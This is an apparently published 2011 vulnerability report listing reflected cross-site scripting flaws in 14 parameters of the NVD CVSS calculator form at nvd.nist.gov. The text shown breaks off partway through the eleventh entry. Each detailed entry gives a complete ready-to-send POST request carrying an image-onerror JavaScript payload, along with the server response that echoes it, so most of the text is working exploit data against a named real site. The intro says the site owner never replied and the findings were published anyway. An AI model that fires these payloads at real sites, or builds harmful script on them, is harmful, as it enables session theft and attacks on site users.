XSS, CWE-79, CAPEC-86, nvd.nist.gov, Cross Site Scripting

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Research Blog at Wed Mar 16 20:47:21 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

Loading

Summary: On March 16, 2011 we were using the CVSS Calculator to compute the CVSS Scores for the SmarterMail 8.0 and SmarterStats 6.0 Exploits. It was apparent that the Form was vulnerable to XSS and it turned out every field and parameter was vulnerable to XSS. We e-mailed the address of record, but, never received a reply, yet, we know they received our e-mail due to side channel leakage, Site down, and then Form fixed. It would have been nice to document as a CVE and Publishing the Unforgivable Vulnerability further underscores a position that very few entities as of Q1/2011 truly understand the true execution risk of a Web Application.

1. Cross-site scripting (reflected)

1.1. http://nvd.nist.gov/cvss.cfm [AccessComplexityVar parameter]

1.2. http://nvd.nist.gov/cvss.cfm [AccessVectorVar parameter]

1.3. http://nvd.nist.gov/cvss.cfm [AuthenticationVar parameter]

1.4. http://nvd.nist.gov/cvss.cfm [AvailImpactVar parameter]

1.5. http://nvd.nist.gov/cvss.cfm [AvailabilityRequirementVar parameter]

1.6. http://nvd.nist.gov/cvss.cfm [CollateralDamagePotentialVar parameter]

1.7. http://nvd.nist.gov/cvss.cfm [ConfImpactVar parameter]

1.8. http://nvd.nist.gov/cvss.cfm [ConfidentialityRequirementVar parameter]

1.9. http://nvd.nist.gov/cvss.cfm [ExploitabilityVar parameter]

1.10. http://nvd.nist.gov/cvss.cfm [IntegImpactVar parameter]

1.11. http://nvd.nist.gov/cvss.cfm [IntegrityRequirementVar parameter]

1.12. http://nvd.nist.gov/cvss.cfm [RemediationLevelVar parameter]

1.13. http://nvd.nist.gov/cvss.cfm [ReportConfidenceVar parameter]

1.14. http://nvd.nist.gov/cvss.cfm [TargetDistributionVar parameter]



1. Cross-site scripting (reflected)
XSS in nvd.nist.gov, DORK, Cross Site Scripting, CWE-79, CAPEC-86 XSS in nvd.nist.gov, DORK, Cross Site Scripting, CWE-79, CAPEC-86 XSS in nvd.nist.gov, DORK, Cross Site Scripting, CWE-79, CAPEC-86
There are 14 instances of this issue:


1.1. http://nvd.nist.gov/cvss.cfm [AccessComplexityVar parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the AccessComplexityVar request parameter is copied into the HTML document as plain text between tags. The payload 90c1e<img%20src%3da%20onerror%3dalert(1)>cadc28868d1 was submitted in the AccessComplexityVar parameter. This input was echoed as 90c1e<img src=a onerror=alert(1)>cadc28868d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.7190c1e<img%20src%3da%20onerror%3dalert(1)>cadc28868d1&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:11 GMT
Content-Length: 9446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 0.7190c1e<img src=a onerror=alert(1)>cadc28868d1 cannot be converted to a number.
</h1>
...[SNIP]...

1.2. http://nvd.nist.gov/cvss.cfm [AccessVectorVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the AccessVectorVar request parameter is copied into the HTML document as plain text between tags. The payload 985c5<img%20src%3da%20onerror%3dalert(1)>95fcd52d0af was submitted in the AccessVectorVar parameter. This input was echoed as 985c5<img src=a onerror=alert(1)>95fcd52d0af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0985c5<img%20src%3da%20onerror%3dalert(1)>95fcd52d0af&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:11 GMT
Content-Length: 9445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 1.0985c5<img src=a onerror=alert(1)>95fcd52d0af cannot be converted to a number.
</h1>
...[SNIP]...

1.3. http://nvd.nist.gov/cvss.cfm [AuthenticationVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the AuthenticationVar request parameter is copied into the HTML document as plain text between tags. The payload 4a7c7<img%20src%3da%20onerror%3dalert(1)>c2a5bebf2e7 was submitted in the AuthenticationVar parameter. This input was echoed as 4a7c7<img src=a onerror=alert(1)>c2a5bebf2e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.7044a7c7<img%20src%3da%20onerror%3dalert(1)>c2a5bebf2e7&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirem
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:12 GMT
Content-Length: 9447

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 0.7044a7c7<img src=a onerror=alert(1)>c2a5bebf2e7 cannot be converted to a number.
</h1>
...[SNIP]...

1.4. http://nvd.nist.gov/cvss.cfm [AvailImpactVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the AvailImpactVar request parameter is copied into the HTML document as plain text between tags. The payload b9a42<img%20src%3da%20onerror%3dalert(1)>99a13d10808 was submitted in the AvailImpactVar parameter. This input was echoed as b9a42<img src=a onerror=alert(1)>99a13d10808 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660b9a42<img%20src%3da%20onerror%3dalert(1)>99a13d10808&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&ExploitabilityVar=-1&RemediationLevelVar=-1&ReportCo
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:14 GMT
Content-Length: 9442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 0.660b9a42<img src=a onerror=alert(1)>99a13d10808 cannot be converted to a number.
</h1>
...[SNIP]...

1.5. http://nvd.nist.gov/cvss.cfm [AvailabilityRequirementVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the AvailabilityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 6fe4f<img%20src%3da%20onerror%3dalert(1)>1e68c5fc824 was submitted in the AvailabilityRequirementVar parameter. This input was echoed as 6fe4f<img src=a onerror=alert(1)>1e68c5fc824 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-16fe4f<img%20src%3da%20onerror%3dalert(1)>1e68c5fc824&ExploitabilityVar=-1&RemediationLevelVar=-1&ReportConfidenceVar=-1

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:16 GMT
Content-Length: 9564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value -16fe4f<img src=a onerror=alert(1)>1e68c5fc824 cannot be converted to a number.
</h1>
...[SNIP]...

1.6. http://nvd.nist.gov/cvss.cfm [CollateralDamagePotentialVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the CollateralDamagePotentialVar request parameter is copied into the HTML document as plain text between tags. The payload 22afc<img%20src%3da%20onerror%3dalert(1)>4b7e5cb61d9 was submitted in the CollateralDamagePotentialVar parameter. This input was echoed as 22afc<img src=a onerror=alert(1)>4b7e5cb61d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-122afc<img%20src%3da%20onerror%3dalert(1)>4b7e5cb61d9&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&ExploitabilityVar=-1&RemediationLevelVar=-1&ReportConfidenceVar=-1

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:14 GMT
Content-Length: 9586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value -122afc<img src=a onerror=alert(1)>4b7e5cb61d9 cannot be converted to a number.
</h1>
...[SNIP]...

1.7. http://nvd.nist.gov/cvss.cfm [ConfImpactVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the ConfImpactVar request parameter is copied into the HTML document as plain text between tags. The payload 4ed35<img%20src%3da%20onerror%3dalert(1)>74427bc6818 was submitted in the ConfImpactVar parameter. This input was echoed as 4ed35<img src=a onerror=alert(1)>74427bc6818 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.6604ed35<img%20src%3da%20onerror%3dalert(1)>74427bc6818&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&Exploitabi
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:13 GMT
Content-Length: 9442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 0.6604ed35<img src=a onerror=alert(1)>74427bc6818 cannot be converted to a number.
</h1>
...[SNIP]...

1.8. http://nvd.nist.gov/cvss.cfm [ConfidentialityRequirementVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the ConfidentialityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 6dd8d<img%20src%3da%20onerror%3dalert(1)>8035976d30a was submitted in the ConfidentialityRequirementVar parameter. This input was echoed as 6dd8d<img src=a onerror=alert(1)>8035976d30a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-16dd8d<img%20src%3da%20onerror%3dalert(1)>8035976d30a&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&ExploitabilityVar=-1&RemediationLevelVar=-1&ReportConfidenceVar=-1

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:15 GMT
Content-Length: 9564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value -16dd8d<img src=a onerror=alert(1)>8035976d30a cannot be converted to a number.
</h1>
...[SNIP]...

1.9. http://nvd.nist.gov/cvss.cfm [ExploitabilityVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the ExploitabilityVar request parameter is copied into the HTML document as plain text between tags. The payload 249f3<img%20src%3da%20onerror%3dalert(1)>56ad8b2ec23 was submitted in the ExploitabilityVar parameter. This input was echoed as 249f3<img src=a onerror=alert(1)>56ad8b2ec23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&ExploitabilityVar=-1249f3<img%20src%3da%20onerror%3dalert(1)>56ad8b2ec23&RemediationLevelVar=-1&ReportConfidenceVar=-1

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:17 GMT
Content-Length: 9521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value -1249f3<img src=a onerror=alert(1)>56ad8b2ec23 cannot be converted to a number.
</h1>
...[SNIP]...

1.10. http://nvd.nist.gov/cvss.cfm [IntegImpactVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the IntegImpactVar request parameter is copied into the HTML document as plain text between tags. The payload 8720b<img%20src%3da%20onerror%3dalert(1)>ed0ce7f1cbb was submitted in the IntegImpactVar parameter. This input was echoed as 8720b<img src=a onerror=alert(1)>ed0ce7f1cbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.6608720b<img%20src%3da%20onerror%3dalert(1)>ed0ce7f1cbb&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-1&AvailabilityRequirementVar=-1&ExploitabilityVar=-1&Remediatio
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:13 GMT
Content-Length: 9442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 0.6608720b<img src=a onerror=alert(1)>ed0ce7f1cbb cannot be converted to a number.
</h1>
...[SNIP]...

1.11. http://nvd.nist.gov/cvss.cfm [IntegrityRequirementVar parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nvd.nist.gov
Path:   /cvss.cfm

Issue detail

The value of the IntegrityRequirementVar request parameter is copied into the HTML document as plain text between tags. The payload 97b09<img%20src%3da%20onerror%3dalert(1)>c114a31754d was submitted in the IntegrityRequirementVar parameter. This input was echoed as 97b09<img src=a onerror=alert(1)>c114a31754d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /cvss.cfm?calculator&version=2 HTTP/1.1
Host: nvd.nist.gov
Proxy-Connection: keep-alive
Referer: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=(AV:N/AC:L/Au:N/C:C/I:C/A:C)
Cache-Control: max-age=0
Origin: http://nvd.nist.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 365

Action=Update+Scores&AccessVectorVar=1.0&AccessComplexityVar=0.71&AuthenticationVar=0.704&ConfImpactVar=0.660&IntegImpactVar=0.660&AvailImpactVar=0.660&CollateralDamagePotentialVar=-1&TargetDistributionVar=-1&ConfidentialityRequirementVar=-1&IntegrityRequirementVar=-197b09<img%20src%3da%20onerror%3dalert(1)>c114a31754d&AvailabilityRequirementVar=-1&ExploitabilityVar=-1&RemediationLevelVar=-1&ReportConfidenceVar=-1

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
server-error: true
X-Powered-By: ASP.NET
Date: Thu, 17 Mar 2011 01:40:16 GMT
Content-Length: 9564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
